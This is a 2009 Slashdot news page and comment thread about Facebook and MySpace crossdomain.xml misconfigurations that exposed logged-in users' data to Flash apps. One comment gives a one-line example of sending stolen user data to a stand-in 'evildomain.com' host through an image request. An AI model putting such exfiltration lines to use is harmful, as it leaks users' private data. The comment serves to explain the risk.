Facebook and MySpace Backdoors Found, Fixed

← Back to Stories (view on slashdot.org)

Facebook and MySpace Backdoors Found, Fixed

Posted by Soulskill on Thursday November 5, 2009 @04:29AM from the oh-adobe-you-card dept.

jamie writes with news of a Facebook app developer who found a significant security hole while he was trying to get around function limitations for his application. Quoting: "Luckily — just with browser AJAX requests — a flash application hosted on domain X is unable to open a file on domain Y. If this would be possible, domain X [would be] able to access content on domain Y, and when the user is logged in on domain Y retrieve and post back any personal data. In certain cases this could limit a Flash application's capabilities. ... To resolve such issues, Adobe (Flash's developers) introduced a 'crossdomain.xml' file which could allow certain domains to access another domain, leading to cross-domain access by certain or all domains. While indeed Facebook locked the front door from any non-Facebook domain access via Flash, a simple subdomain change allowed any flash application (domain="*") to access its domain data." He found a similar problem in MySpace's crossdomain.xml. Both sites were notified, and they have implemented fixes.

106 comments

Min score:

Reason:

Sort:

Huh. by Velorium · 2009-11-05 04:35 · Score: 5, Insightful

I wonder how many people figured this out and didn't report it.
1. Re:Huh. by girlintraining · 2009-11-05 04:50 · Score: 4, Informative
  
  I wonder how many people figured this out and didn't report it.
  They didn't need to figure it out... Facebook lets people suck all that data out by making a game about vampires, pirates, farming, or god only knows whatever else is out there. Why go through the back door when the front door is already open and a welcome mat thrown out?
  
  --
  #fuckbeta #iamslashdot #dicemustdie
2. Re:Huh. by Monkeedude1212 · 2009-11-05 05:20 · Score: 1
  
  Exactly. If you are in the business of stealing a persons data you're probably a hacker. If you're a hacker you probably know some programming. If you know some programming you can throw together a Facebook game over the course of a weekend.
  Then once 3 million people use your App - you can access their data. ...
  Have they fixed that yet? They've been aware of THAT problem for months.
3. Re:Huh. by Aladrin · 2009-11-05 05:31 · Score: 1
  
  Game!? Hah! Throw together a 'quiz' and you'll have them signing up in droves. It's ridiculous.
  As for as 'over the course of a weekend', I can attest to that. I managed to get Zend Framework to authenticate with Facebook and write the basic structure of a game in a weekend, while I was watching tv, playing games, reading both english and japanese, and I'm pretty sure I went out to see a movie, too. It's ridiculously easy to write something for Facebook.
  
  --
  "If you make people think they're thinking, they'll love you; But if you really make them think, they'll hate you." - DM
4. Re:Huh. by Anonymous Coward · 2009-11-05 08:27 · Score: 1, Funny
  
  araadarin san ha nihongo no hon o yomimasu ka? dou deshita ka?
5. Re:Huh. by commodoresloat · 2009-11-05 15:01 · Score: 1
  
  I think "Tom" knew about it but he didn't tell anybody. Who knows, though; that guy is friends with everyone.
McCroskey by Captain+Splendid · 2009-11-05 04:37 · Score: 3, Funny

Looks like I picked the wrong week to deactivate my FB account.

--
Linux, you magnificent bastard, I read the fucking manual!
1. Re:McCroskey by natehoy · 2009-11-05 04:45 · Score: 2, Funny
  
  Surely you can't be serious?
  
  --
  "This post contains words, known to the State of California to cause thought. Wash brain thoroughly after reading."
2. Re:McCroskey by megamerican · 2009-11-05 04:45 · Score: 1
  
  Looks like I picked the wrong week to deactivate my FB account.
  Why? I've been on facebook since late 2004 and have never used a single app. You'd have been perfectly safe if you never used them or only used ones which you absolutely trusted.
  
  --
  If you have something that you dont want anyone to know, maybe you shouldnt be doing it in the first place -Eric Schmidt
3. Re:McCroskey by Itninja · 2009-11-05 04:50 · Score: 1
  
  Wow...that's like the year FB started...back when it was The Facebook. Yet you have a 7 digit /. ID. Not sure what how much geekcred that averages out to.
  
  --
  I judt got a nre Kinesis keybiartf so please excusr ant egregiou typos.
4. Re:McCroskey by darthflo · 2009-11-05 04:52 · Score: 4, Interesting
  
  Curiously few people seem to have gotten that. I've got an account named "John Doe" to try 'em out and another one which I add people I know to. Funnily, John Doe has several hundred friends already, despite not actually existing.
5. Re:McCroskey by natehoy · 2009-11-05 04:53 · Score: 4, Insightful
  
  If I understand it, I have significant access to my friends' data on Facebook. When *I* sign up for an account, the app not only has access to my data, but any and all data I have access to. So you might not have given access to your data, but a friend might.
  Plus, doesn't Facebook use Flash on a few of their ads? With the old crossdomain setting, Facebook's advertisers could also have gained access to your data.
  Don't post anything on Facebook you aren't comfortable telling your friends, your boss, your wife, or any random stranger.
  
  --
  "This post contains words, known to the State of California to cause thought. Wash brain thoroughly after reading."
6. Re:McCroskey by Anonymous Coward · 2009-11-05 04:53 · Score: 0
  
  I am. And don't call me Shirley.
7. Re:McCroskey by wiz31337 · 2009-11-05 04:57 · Score: 1
  
  I agree, unfortunately there are a lot of people that don't realize this and will click on any and every cool looking app out there.
  However, even if your Facebook account is compromised people need to realize that they should only be putting information on their page that they want the whole world to see. If people would just ask themselves one question "Am I ok with my [boss, wife, mom, complete stranger] knowing this" before posting a lot of issues could be avoided.
  
  --
  /whisper/ Thanks for the candy!
8. Re:McCroskey by Anonymous Coward · 2009-11-05 05:05 · Score: 0
  
  I want the kids in bed by nine, I want the dog fed, the yard watered, and the gate locked. And get a note to the milkman: no more cheese!
9. Re:McCroskey by bi_boy · 2009-11-05 05:25 · Score: 1
  
  The problem is if any of your friends used an app or took quiz that means all of your information was compromised also.
  
  --
  Chicken fried butter sticks? Do ... do you use a fork? - Black Mage, 8-Bit Theater
10. Re:McCroskey by CannonballHead · 2009-11-05 05:29 · Score: 1
  
  Don't post anything on Facebook you aren't comfortable telling your friends, your boss, your wife, or any random stranger.
  It's sad you have to tell people this.
  It's like putting up fliers on telephone poles and signing your name (and picture) with it. And then asking how people found out.
11. Re:McCroskey by rickb928 · 2009-11-05 05:37 · Score: 1
  
  Maybe someone can help you with that? Whether you know it or not?
  
  --
  deleting the extra space after periods so i can stay relevant, yeah.
12. Re:McCroskey by ThatsNotPudding · 2009-11-05 06:30 · Score: 1
  
  Don't post anything on Facebook.
  
  Fixed it for you.
13. Re:McCroskey by tenton · 2009-11-05 06:56 · Score: 1
  
  The one where people have actually watched the movie "Airplane!"
14. Re:McCroskey by 0100010001010011 · 2009-11-05 08:01 · Score: 1
  
  Facebook has nearly the equivalent of ACLs. Learn to use the groups and privacy functions. You can put people into groups and then give groups, or individual people access (or block access) to nearly any aspect of the site. (And I'm guessing by extension Apps that those people use).
  Right now everything is locked down to the point that NO ONE can see anything by default. You can't even search me by name because I don't 'exist'. No pictures, no information, nothing.
  I have "Family", "Friends", "Acquaintances", "Co-Workers", etc.
  If I want to share that great night out at the bars, my Friends get access and then my cousin that's the same as me.
  Those family vacation photos: Family and Co-Workers.
  My full name address and cell phone: Family, Friends & Co-Workers.
  Benign information: Acquaintances.
15. Re:McCroskey by natehoy · 2009-11-05 08:20 · Score: 2, Informative
  
  So if someone in your "Family" group wants to find out what kind of left-handed vampire they are, then the app they are running has the same access to your profile that they do.
  That's the problem. You might trust the person, but they are running apps that might not be as trustworthy, and those apps adopt their Facebook authority to run.
  At least that's how I understand it.
  
  --
  "This post contains words, known to the State of California to cause thought. Wash brain thoroughly after reading."
16. Re:McCroskey by Anonymous Coward · 2009-11-05 15:59 · Score: 0
  
  Don't post anything on Facebook you aren't comfortable telling your friends, your boss, your wife, or any random stranger.
  I don't have any problem telling my secrets to random strangers. Just don't tell my friends or my boss, and especially don't tell my family.
17. Re:McCroskey by Anonymous Coward · 2009-11-05 19:34 · Score: 0
  
  Curiously few people seem to have gotten that. I've got an account named "John Doe" to try 'em out and another one which I add people I know to. Funnily, John Doe has several hundred friends already, despite not actually existing.
  So that's why I get hate mail from people I don't even know, you insensitive clods...
  -JD
18. Re:McCroskey by Anonymous Coward · 2009-11-06 03:42 · Score: 0
  
  Wouldn't it be awesome to have an "anonymous" option in facebook? I could tell everyone that natehoy sucks balls there as well as here, without repercussions!
Blunderware... by adosch · 2009-11-05 04:46 · Score: 1, Interesting

I feel it as a personal accomplishment I *dont* have social network accounts on Facebook, Myspace and alike. It's bad enough people openly don't care about privacy or salvaging their identity, but ITFA, this clearly lets you 0wn any account in an auto-login status. And the guy is absolutely right... what typical, non-aware user doesn't? Glad to see all those bad script-kiddie hack sites that boast breaking into social network accounts for $100 a pop will lose a bit of their income to buy Mt. Dew and oreos due to this being publicly uncovered...
1. Re:Blunderware... by maxume · 2009-11-05 05:04 · Score: 2, Insightful
  
  Well, it is an achievement, much in the same way that not eating a bucket of KFC everyday is an achievement
  
  --
  Nerd rage is the funniest rage.
2. Re:Blunderware... by Anonymous Coward · 2009-11-05 05:05 · Score: 0, Insightful
  
  I feel it as a personal accomplishment I *dont* have social network accounts on Facebook, Myspace and alike.
  
  I hate to break this to you.... wait, actually I rather enjoy it. I was just trying to be polite. Let's face it, you're on Slashdot. You're either an asshole, a moron, or a zealot. Possibly even a combination of all 3. People in real life don't want to associate with you, much less be your friend in a social network. Let's also be clear about something here. You aren't important enough for anyone to want your information. That's just the way it is. There is no reason for you to feel accomplished in not having an account. Nothing you have actually matters to anyone except you.
3. Re:Blunderware... by imakemusic · 2009-11-05 05:10 · Score: 3, Funny
  
  I feel it as a personal accomplishment I *dont* have social network accounts on Facebook, Myspace and alike.
  
  Well, you say that but we all know it's because you don't have any friends.
  
  --
  Brain surgery - it's not rocket science!
4. Re:Blunderware... by Velorium · 2009-11-05 05:13 · Score: 0, Flamebait
  
  Apparently you fit under the category of asshole? Sadly I already posted and can't mod this flamebait.
5. Re:Blunderware... by Culture20 · 2009-11-05 05:23 · Score: 1
  
  I feel it as a personal accomplishment I *dont* have social network accounts on Facebook, Myspace and alike.
  Wait, so that's a fake you on FB whose last status update was "I <3 my little ponies"? I can't be your friend any more. I like the FB you better.
6. Re:Blunderware... by tibman · 2009-11-05 05:30 · Score: 1
  
  There are actually accomplished non-asshole, intelligent, and fair-minded people here on slashdot. Somewhere... hidden among all the assholes.. probably..
  Also, you are dead wrong :) data-mining anyone and everyone seems to be a very popular thing, whether you think the people are important or not.
  
  --
  http://soylentnews.org/~tibman
7. Re:Blunderware... by TheRaven64 · 2009-11-05 05:41 · Score: 1
  
  I think you might be projecting a bit there. Lots of us have offline lives too. I don't have an account on any social networking sites either. I set up a mailing list for my friends to use to organise social activities. It's trivial for them to use: just send a mail to the address and everyone else gets it. Even the least technical of them can manage that, while a few of them have problems with Facebook. I don't get the shared online photo album stuff, but people show me photos at parties instead so I don't feel like I'm missing out.
  
  --
  I am TheRaven on Soylent News
8. Re:Blunderware... by tibman · 2009-11-05 05:45 · Score: 1
  
  I will agree with you that it's a small accomplishment to not have a social networking account anywhere. Mostly because everyone goes "sign up so we can do X together" or "sign up so we can be 'in a relationship' together" or whatever other viral method of spreading is popular today.
  I still have an LJ account from around the time i first signed up at slashdot. *sigh* yes! i know that is a blog.. and yes i know that blogs aren't cool anymore. But what i discovered is that when it became uncool.. suddenly the quality of posts and comments improved! It's obvious why in hindsight, really.
  
  --
  http://soylentnews.org/~tibman
9. Re:Blunderware... by Nerdfest · 2009-11-05 05:48 · Score: 1
  
  There are actually accomplished non-asshole, intelligent, and fair-minded people here on slashdot.
  
  Those would be the zealots.
10. Re:Blunderware... by Fast+Thick+Pants · 2009-11-05 05:59 · Score: 1
  You aren't important enough for anyone to want your information.
  Incorrect if...
  you have a bank account with cash
  you have a credit card or decent credit
  you've pissed off someone who's tech-savvy, or who'll hire a tech-savvy private investigator
  you have an attractive cousin
  cetera...
11. Re:Blunderware... by Anonymous Coward · 2009-11-05 06:03 · Score: 0
  
  Also if you ever apply for a job with a company that does any sort of background check. Although at this point it might be more of a red flag if they *can't* find anything about you online, 'cause that would mean you're sneaky.
12. Re:Blunderware... by tibman · 2009-11-05 06:13 · Score: 1
  
  Zealot isn't like a class you pick when you signup for slashdot... though maybe a class system would clear the air a bit
  Just saying! hah.
  
  --
  http://soylentnews.org/~tibman
13. Re:Blunderware... by Anonymous Coward · 2009-11-05 06:17 · Score: 0
  
  How the hell is this insightful? He insults the GP and then makes wrong conclusions while conveniently forgetting the fact that data mining is not targeted at anyone especially...
14. Re:Blunderware... by adosch · 2009-11-05 06:27 · Score: 1
  
  ...no, it's not anything like that. It's so I don't have to be like you and brag about your mega-uber friend list which is solely derived off your MySpace hit counter. Friends don't comein quantities, they are counted by quality. Wait until the next viral social fag-wagon hits... you'll be the next emo kid to slit your wrists b/c you don't have any more "friends".
15. Re:Blunderware... by Nerdfest · 2009-11-05 06:30 · Score: 1
  
  That my friend, is an excellent idea. You could even earn levels.
16. Re:Blunderware... by colesw · 2009-11-05 06:49 · Score: 1
  
  And also earn Achievements!
17. Re:Blunderware... by Arthur+Grumbine · 2009-11-05 07:22 · Score: 1
  
  I'm guessing those mods are the kind of folks who are very sensitive about the how many "friends" they have on social network sites, and don't like anyone raining on their parade - consequently supporting anyone who lashes out at people who don't need the constant sense of validation that social networks bring.
  
  --
  Now that I think about it, I'm pretty sure everything I just said is completely wrong.
18. Re:Blunderware... by mcgrew · 2009-11-05 07:38 · Score: 1
  
  Hey, you're right! He does have one fan, though.
  
  --
  Free Martian Whores!
19. Re:Blunderware... by Anonymous Coward · 2009-11-05 07:42 · Score: 0
  
  Somewhere... hidden among all the assholes.. probably..
  It's called "kidnapping" and we're trying to keep it secret, so hush!
20. Re:Blunderware... by Dragonslicer · 2009-11-05 08:12 · Score: 1
  
  Zealot isn't like a class you pick when you signup for slashdot...
  Yeah, you have to spend at least a couple months as a Marine or Zergling first.
21. Re:Blunderware... by Dragonslicer · 2009-11-05 08:16 · Score: 1
  
  It's so I don't have to be like you and brag about your mega-uber friend list which is solely derived off your MySpace hit counter.
  Instead you can brag about how you're too good to have an account on any such sites.
  
  I think The Onion needs to do a follow-up to the feature article about the man who doesn't have cable television.
22. Re:Blunderware... by JonJ · 2009-11-05 08:33 · Score: 1
  
  "sign up so we can be 'in a relationship' together"
  Be in a what together? Does this require that I leave my basement? In that case, no thanks!
  
  --
  -- Linux user #369862
23. Re:Blunderware... by adosch · 2009-11-05 09:02 · Score: 1
  
  Instead you can brag about how you're too good to have an account on any such sites.
  ...too good? or not a passive, social parasite looking for any outlet to 'get noticed' or 'get attention'. You choose to waste your time posting to the world about what you did every 5 minutes for the last hour with your My-Twit-Face account and 'hope' your friends make time to observe it. I simply take that time and spend it with my friends.
24. Re:Blunderware... by Dhalka226 · 2009-11-05 10:51 · Score: 1
  
  Let's face it, you're on Slashdot. You're either an asshole, a moron, or a zealot.
  
  The irony abounds.
25. Re:Blunderware... by MrPhilby · 2009-11-05 12:16 · Score: 1
  
  I find it hard to choose
26. Re:Blunderware... by Anonymous Coward · 2009-11-05 18:17 · Score: 0
  
  Want to know a little secret? No one cares. By acting like having a Facebook account is a big deal...you are in fact making it a big deal.
  People like to think that everything they post will be immortalized or that it has incredible importance, but it won't and it doesn't. Someday Facebook will die and will take all your bitchy wall posts, drunken status updates, and embarrassing photos with it. Choose to use it or don't. Choose to post all your info on it or choose not to. Neither decision is really that big of a deal.
  As far as breaking into accounts...are you twelve or something? Who would care? What's the former account owner to do? End his life, or set up a new account? "A whole evening ruined! Curse you, Facebook hackers!".
  It's just a crappy contact list/message board app after all, and not the be all end all of the world it exists in. To consider that some people think it actually *is* their identity is absurd beyond belief. I don't know whether to laugh, cry or shrug.
27. Re:Blunderware... by Anonymous Coward · 2009-11-05 18:48 · Score: 0
  
  Also if you ever apply for a job with a company that does any sort of background check. Although at this point it might be more of a red flag if they *can't* find anything about you online, 'cause that would mean you're sneaky.
  Or it could mean absolutely nothing at all. The background report is guaranteed to contain standard issue stuff that is available from public records.
  -Where you live/have lived and some people that lived at the same residence in the same time period.
  -credit history, bankruptcy filings, financial info
  -criminal history, driver's license photo
  etc
  And possibly your work history if a linkedin bot or something built a profile for you because your name was on a corporate webpage.
  They will find stuff online and your report will not be blank. You generate a trail merely by existing in society. This is what will be given as your background report and it will likely pass. Lack of a Myspace or Facebook would hardly be incriminating, unless you're applying for a job that requires you to have excellent networking and social skills. So since you're on slashdot I doubt that means you. ;)
What about image.src? by Anonymous Coward · 2009-11-05 04:52 · Score: 0

Couldn't an evil app always send out sensitive information via:
image.src="http://evildomain.com/script?username=victim&sensitiveinfo=gotcha"
1. Re:What about image.src? by gazbo · 2009-11-05 05:24 · Score: 1
  
  This story's about accessing private data in the first place, not sending the data once accessed.
2. Re:What about image.src? by Anonymous Coward · 2009-11-05 06:31 · Score: 0
  
  I was under the impression that the crossdomain.xml file was applied to the server hosting the flash app, but it looks like it is the other way around. In my opinion, this is bassackwards.
maybe by Anonymous Coward · 2009-11-05 04:58 · Score: 0

this why the fb chat plugin for pidgin/adium is broken?
1. Re:maybe by Velorium · 2009-11-05 05:17 · Score: 1
  
  That's an interesting thought. Throw Digsby into the mix too, as they had a patch just the other day to fix facebook chat.
2. Re:maybe by F-3582 · 2009-11-05 05:30 · Score: 1
  
  They just got updated with a fix for that issue.
How much did paypal pay for that domain? by OCURServant · 2009-11-05 05:00 · Score: 1

God damn paypal! Always messing things up
Damn by kenp2002 · 2009-11-05 05:07 · Score: 1

There went my plan for consulting for HR departments by checking Facebook and Myspace profiles. Guess I am stuck snooping Slashdot accounts and news sites for $10 a person.

--
-=[ Who Is John Galt? ]=-
1. Re:Damn by MillionthMonkey · 2009-11-05 07:45 · Score: 1
  
  Ask the guy if you can buy (share) his identity so you can take the MySpace job offer while he takes the one from Facebook.
  
  Maybe YOU can be the one at Facebook instead, if you offer enough cash, but they might be better able to figure out who you are.
Facebook is a buggy mess by WankersRevenge · 2009-11-05 05:19 · Score: 4, Insightful

It amazes me that facebook rose to prominence in the way it did. Out of all the sites I have ever used, Facebook is the worst when it comes to bugs. It simply floors me at how much bad code is pushed out to production servers or how many things break on a daily basis. I'm not talking simple copy bugs, but full on showstopping bugs. At one point, I was filing bug reports to them on a daily basis. If there is any qa department, it is incredibly lax. I'm guessing it's just a couple of interns sniffing for a gig. The only reason I'm using facebook is to grow my zombie blog, and once I reach a point where my traffic isn't dependent on that site, I'm dropping them like a friggin rock. And it will be a glorious day indeed.
1. Re:Facebook is a buggy mess by Chameleon+Man · 2009-11-05 06:20 · Score: 1
  
  This interview gives a brief glimpse as to how Facebook's office dynamic is like. Surprised they get anything done.
2. Re:Facebook is a buggy mess by mcgrew · 2009-11-05 08:02 · Score: 1
  
  Out of all the sites I have ever used, Facebook is the worst when it comes to bugs.
  I see you've never been to slashdot.
  
  --
  Free Martian Whores!
3. Re:Facebook is a buggy mess by Dragonslicer · 2009-11-05 08:18 · Score: 1
  
  Out of all the sites I have ever used, Facebook is the worst when it comes to bugs.
  All three of them?
4. Re:Facebook is a buggy mess by stephanruby · 2009-11-05 09:02 · Score: 1
  
  Out of all the sites I have ever used, Facebook is the worst when it comes to bugs.
  I'm guessing you've never used friendster, myspace, or slashdot.
5. Re:Facebook is a buggy mess by commodoresloat · 2009-11-05 15:08 · Score: 1
  
  The only reason I'm using facebook is to grow my zombie blog....
  There was once a day you just didn't hear sentences like this.
Now if only Adobe would... by Dracos · 2009-11-05 05:36 · Score: 1

Remove Flash's ability for cross-domain cookies. Browser plugins should use the browser's cookie storage, IMO.
1. Re:Now if only Adobe would... by EkriirkE · 2009-11-05 05:57 · Score: 1
  
  For the lazy... http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager07.html
  
  --
  from 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 to 45 2F 6E 40 3C DF 10 71 4E 41 DF AA 25 7D 31 3F
I'm wondering... by clone53421 · 2009-11-05 06:07 · Score: 1

What about the backdoor that lets you find someone's picture album and their profile if you have the filename of one of their pictures from the album (say, someone dragged the picture into a folder, and then e-mailed it or posted it on a message board, thinking that since they're not posting a link to the facebook photo they're anonymous)?
Will they ever fix that?

--
Alexander Peter Kristopeit bought his basement from his mommy for one dollar.
1. Re:I'm wondering... by Anonymous Coward · 2009-11-05 06:41 · Score: 0
  
  That isn't really a back door, per se. It can reveal someone's profile ID number, but knowing that only allows you access to any parts of the person's profile that are publicly viewable. It isn't an ideal situation, but if you're foolish enough to post a photo on a message board somewhere without sanitizing the metadata (and in this case, the file name is a type of metadata), that is hardly Facebook's fault—no more than it would be Canon or Nokia's fault if someone posted a photo with his home's GPS coordinates in the metadata.
2. Re:I'm wondering... by clone53421 · 2009-11-05 06:52 · Score: 1
  
  It also allows you to see all the other photos in that album, even if the album isn't publicly accessible.
  
  --
  Alexander Peter Kristopeit bought his basement from his mommy for one dollar.
3. Re:I'm wondering... by clone53421 · 2009-11-05 07:01 · Score: 1
  
  Regarding sanitizing the metadata, it's not apparent from just glancing at the filename that it contains this information. You have to know, and most people don't.
  It could be relatively easily fixed, too... just use a script to generate the data and pass it in the path name, not the filename. E.g. /image.php/123/456/789/arbitraryfilename.jpg. "arbitraryfilename" can be anything you want it to be, so long as image.php knows to ignore it.
  
  --
  Alexander Peter Kristopeit bought his basement from his mommy for one dollar.
Cross d'oh! man by Anonymous Coward · 2009-11-05 06:16 · Score: 0

The rise of the "cross d'oh! man" http://bit.ly/1x3krU (from http://twitter.com/vambenepe/status/5455193554)
Damnit, people, can you see the problem here? by Tetsujin · 2009-11-05 06:23 · Score: 2, Funny

Surely you can't be serious?
I am. And don't call me Shirley.
People, do you not see the basic problem with using this joke in written format? Without a doubt this is a serious flaw in the English language: we are unable to use the "Don't call me Shirley" joke in written form because, while the words "Shirley" and "surely" are homonyms, the spelling is clearly different...
Ai propoz a simpl fix for this problem: Inglish speekurz shood standardaiz on a striktly phonetik sistem ov speling wurdz. Thas, thi standard "Shirley" jok wud bi exekyutid thus:
"Shirly yu kant bi sirius?"
"Ai em. And dont kal mi Shirly."
Ther, problem solvd.

--
Bow-ties are cool.
1. Re:Damnit, people, can you see the problem here? by mcgrew · 2009-11-05 06:31 · Score: 1
  
  Inglish speekurz shood standardaiz on a striktly phonetik sistem ov speling wurdz
  Ok, is it spelled "kaw" (New England), Kower (south) Kore (midwest), Kwa (Nwoo Yawk)?
  Is it window, winder, or windah?
  And you spelled "uv" rong. See how this is such an incredibly BAD idea?
  
  --
  Free Martian Whores!
2. Re:Damnit, people, can you see the problem here? by Tetsujin · 2009-11-05 07:26 · Score: 1, Funny
  
  Inglish speekurz shood standardaiz on a striktly phonetik sistem ov speling wurdz
  Ok, is it spelled "kaw" (New England), Kower (south) Kore (midwest), Kwa (Nwoo Yawk)?
  Is it window, winder, or windah?
  And you spelled "uv" rong. See how this is such an incredibly BAD idea?
  I did not spell "uv" wrong. The five vowels:
  A E I O U
  Take the following sounds:
  Ah Eh EE Oh OO
  This is in accordance with the usage of the vowels in other European languages, such as Spanish or Italian. Thus, the word "of" would be spelled "ov". "uv" would rhyme with "move"
  Admittedly, some work would need to be done to refine the phonetic spelling system and to promote adoption and education of the new system. I figure in a generation or two we might be able to iron out these regional differences. Of course, some will resist these changes: if we can get the NSA involved to monitor SMS and internet usage and introduce FCC regulations requiring broadcasters and recording artists to always spell and pronounce things correctly, and institute a new bureau of ruthless and violent enforcement, it should be doable. The back-catalogue of music and literature will have to be either destroyed or republished, and owning old editions will have to be criminalized. It'd probably be a good idea to identify uncooperative parents and separate them from their children, so we can properly institutionalize them using the new system.
  Oh, and we'll have to invade England, I think - this nonsense about English English being the authoritative version has got to stop. If we play our political cards right and keep anybody else from getting involved it should be a fairly straightforward war without too much loss of life. We may have to use a few tactical nuclear weapons, but I think once we've established a willingness to use them (say, on a minor city) the Brits will know we mean business. One Britain is down I think it should be relatively easy to make Canada fall in line. Australians and New Zealanders might be a bit of a challenge since they're so well known for their weird accents - we could institute a temporary cultural embargo, that should prevent contamination until we're ready to deal with them.
  In the end it'll all be worth it, though, 'cause we'll be able to use the "Don't call me Shirley" joke in writing and it will work properly. Really, all manner of homonym-based jokes will finally be open to use in writing. It will usher in a new golden age of literature.
  
  --
  Bow-ties are cool.
3. Re:Damnit, people, can you see the problem here? by pwfffff · 2009-11-05 07:27 · Score: 1
  
  It wasn't a joke, it was a popular culture reference. I'd imagine that you're neither popular nor cultured; that would explain your total failure to 'get it'.
4. Re:Damnit, people, can you see the problem here? by roguetrick · 2009-11-05 07:40 · Score: 1
  
  Yes, Airplane! is for the fine cultured palate. The comment wasn't meant to be funny, it was meant as social commentary regarding new technology. Now lets all spout out some Monty Python quotes and give each other handjobs with our pinkies curled.
  
  --
  -The world would be a better place if everyone had a hoverboard
5. Re:Damnit, people, can you see the problem here? by Tetsujin · 2009-11-05 08:06 · Score: 1
  
  It wasn't a joke, it was a popular culture reference. I'd imagine that you're neither popular nor cultured; that would explain your total failure to 'get it'.
  Dude, what are you talking about?
  It's a joke and a pop culture reference. I get it. I've seen "Airplane". I use this joke myself more than is really appropriate.
  But every time a cherry of an opportunity for a "Don't call me Shirley" joke appears in text the opportunity is wasted by the fact that the difference in spelling pretty much kills the joke. It's as if, by the simple act of presenting the joke in written form, the entire funny part of it has been extracted and painstakingly explained at length.
  This is why I advocate a violent campaign to force all English speakers to adopt a truly phonetic system of spelling and standardized pronunciation: when this is accomplished, we will be able to use the "Shirley" joke in written form without it being blunted by the fact that the spelling is different. This will also mean that the book adaptation of "Airplane!" can finally be published!
  
  --
  Bow-ties are cool.
6. Re:Damnit, people, can you see the problem here? by clone53421 · 2009-11-05 08:13 · Score: 1
  
  No, because then how do you distinguish between the sounds in "of" and "over"?
  Ah = [a]fter = aftr
  Eh = [e]ffort = efert
  EE = [e]ven = iven
  Oh = [o]ver = ovr
  OO = wh[o] = hu
  but you still haven't covered several other vowel sounds:
  AA = [a]pe
  Ih = [i]gloo
  II = [i]vory, [ey]es
  Uh = [o]f, [a]ffect, [u]nder
  
  --
  Alexander Peter Kristopeit bought his basement from his mommy for one dollar.
7. Re:Damnit, people, can you see the problem here? by Tetsujin · 2009-11-05 08:27 · Score: 1
  
  No, because then how do you distinguish between the sounds in "of" and "over"?
  Long and short "o" sounds...
  of = "ov"
  over = "ouvr"
  If we wanted to get really fancy we could introduce the schwa into the spelling system (to be more realistic for a moment - in reality a mad crusade to reform spelling would probably just adopt an existing, rigorous system of phonetics... I'm just working with basic latin characters 'cause it's easy for the purposes of this discussion...) but really, it's just as easy to leave it out.
  
  but you still haven't covered several other vowel sounds:
  AA = [a]pe
  Ih = [i]gloo
  II = [i]vory, [ey]es
  Uh = [o]f, [a]ffect, [u]nder
  Simple enough.
  ape = "eip" (long "e" sound, terminating in "p")
  igloo = "iglu" (straightforward, don't see the problem...)
  ivory = "aivori", eyes = "aiz" (the "long I" is really just "a" transitioning into "i")
  of = "ov", affect = "afekt", under = "andr"
  People who pronounced "of" with an "a" sound would be escorted to re-education facilities for treatment... Their cases would be studied by re-education specialists, and if necessary they would be implanted with a small device which monitors their speech and delivers electric shocks when words are mispronounced... Priority cases would receive a version that uses a camera and OCR system to monitor their writing, as well.
  Thus, the prosperity of the written form of the "Shirley" joke would be assured.
  
  --
  Bow-ties are cool.
8. Re:Damnit, people, can you see the problem here? by clone53421 · 2009-11-05 08:29 · Score: 1
  
  of = "ov"
  over = "ouvr"
  If the "o" makes the same sound in "ouvr" as it does in "ov", then "ouvr" is next-to-impossible to pronounce (not to mention doesn't sound like it's supposed to).
  If this is a phonetic system, the "o" has to always make the same sound.
  
  --
  Alexander Peter Kristopeit bought his basement from his mommy for one dollar.
9. Re:Damnit, people, can you see the problem here? by mcgrew · 2009-11-05 08:33 · Score: 1
  
  I did not spell "uv" wrong. The five vowels:
  A E I O U
  Take the following sounds:
  Ah Eh EE Oh OO
  This is in accordance with the usage of the vowels in other European languages, such as Spanish or Italian. Thus, the word "of" would be spelled "ov". "uv" would rhyme with "move"
  Then spell "duh" using Spanish phonetics. You're arguing against your own point.
  I figure in a generation or two we might be able to iron out these regional differences
  We've had radio for a hundred years and TV for almost eighty. If you were right we'd already have gotten rid of regional and cultural differences.
  Of course, some will resist these changes
  Some meaning "almost everybody". Humorous comment!
  Properly written English is far more understandable than spoken English.
  
  --
  Free Martian Whores!
10. Re:Damnit, people, can you see the problem here? by Tetsujin · 2009-11-05 08:38 · Score: 1
  
  of = "ov"
  over = "ouvr"
  If the "o" makes the same sound in "ouvr" as it does in "ov", then "ouvr" is next-to-impossible to pronounce (not to mention doesn't sound like it's supposed to).
  If this is a phonetic system, the "o" has to always make the same sound.
  Well, in any case, "o" doesn't appear in the word "Shirley" so the prosperity of the Shirley joke in written form is unaffected.
  (In retrospect, it is possible that "av" would be a better spelling of "of" - despite my earlier statement that people who use this pronunciation would be detained and forcibly re-educated under the new system...)
  If you want to be really realistic about what sort of phonetic system a vastly powerful, phonetics-system-crusading mad regime would choose to force standardization of English spellings, then probably they would use something more rigorous. But something with a bunch of Unicode characters wouldn't really work on Slashdot for the purposes of this discussion... :)
  Though, I have to say - my original Shirley Joke comment here probably would have been funnier if it had been done up in full IPA or something...
  
  --
  Bow-ties are cool.
11. Re:Damnit, people, can you see the problem here? by Tetsujin · 2009-11-05 08:51 · Score: 1
  
  Then spell "duh" using Spanish phonetics.
  duh = "da" - or maybe just "d"
  I'll admit that's not perfect. I believe this is a sound that would phonetically be marked with a "schwa". There are rigorous phonetics systems that do exist and can cover cases like this - for the purposes of outlining the proposed campaign to secure the prosperity of the written form of the "Shirley" joke (on a system that doesn't support Unicode) I've had to make do with the regular Latin character set.
  
  I figure in a generation or two we might be able to iron out these regional differences
  We've had radio for a hundred years and TV for almost eighty. If you were right we'd already have gotten rid of regional and cultural differences.
  Well, no, because we haven't made a concerted effort (paired with violent and rigorous enforcement) to eliminate deviations from the established standard. Rather, we've allowed these deviations to flourish through pop culture, where their novelty earns them respect...
  
  Of course, some will resist these changes
  Some meaning "almost everybody".
  Well, of course there will be substantial resistance. It just sounds nicer if one describes it as "some" resistance. But, as I said, I feel that the threat of nuclear weapons will be adequate to quell any large-scale opposition to this important change.
  
  Humorous comment!
  <MST3K>thank you!</MST3K>
  
  --
  Bow-ties are cool.
12. Re:Damnit, people, can you see the problem here? by clone53421 · 2009-11-05 09:03 · Score: 1
  
  Meh. No offense, but I didn't think your "Shirley" joke was funny in the first place. It works just fine in written form because everyone knows it already and it got its humour from the original, not the written version.
  
  --
  Alexander Peter Kristopeit bought his basement from his mommy for one dollar.
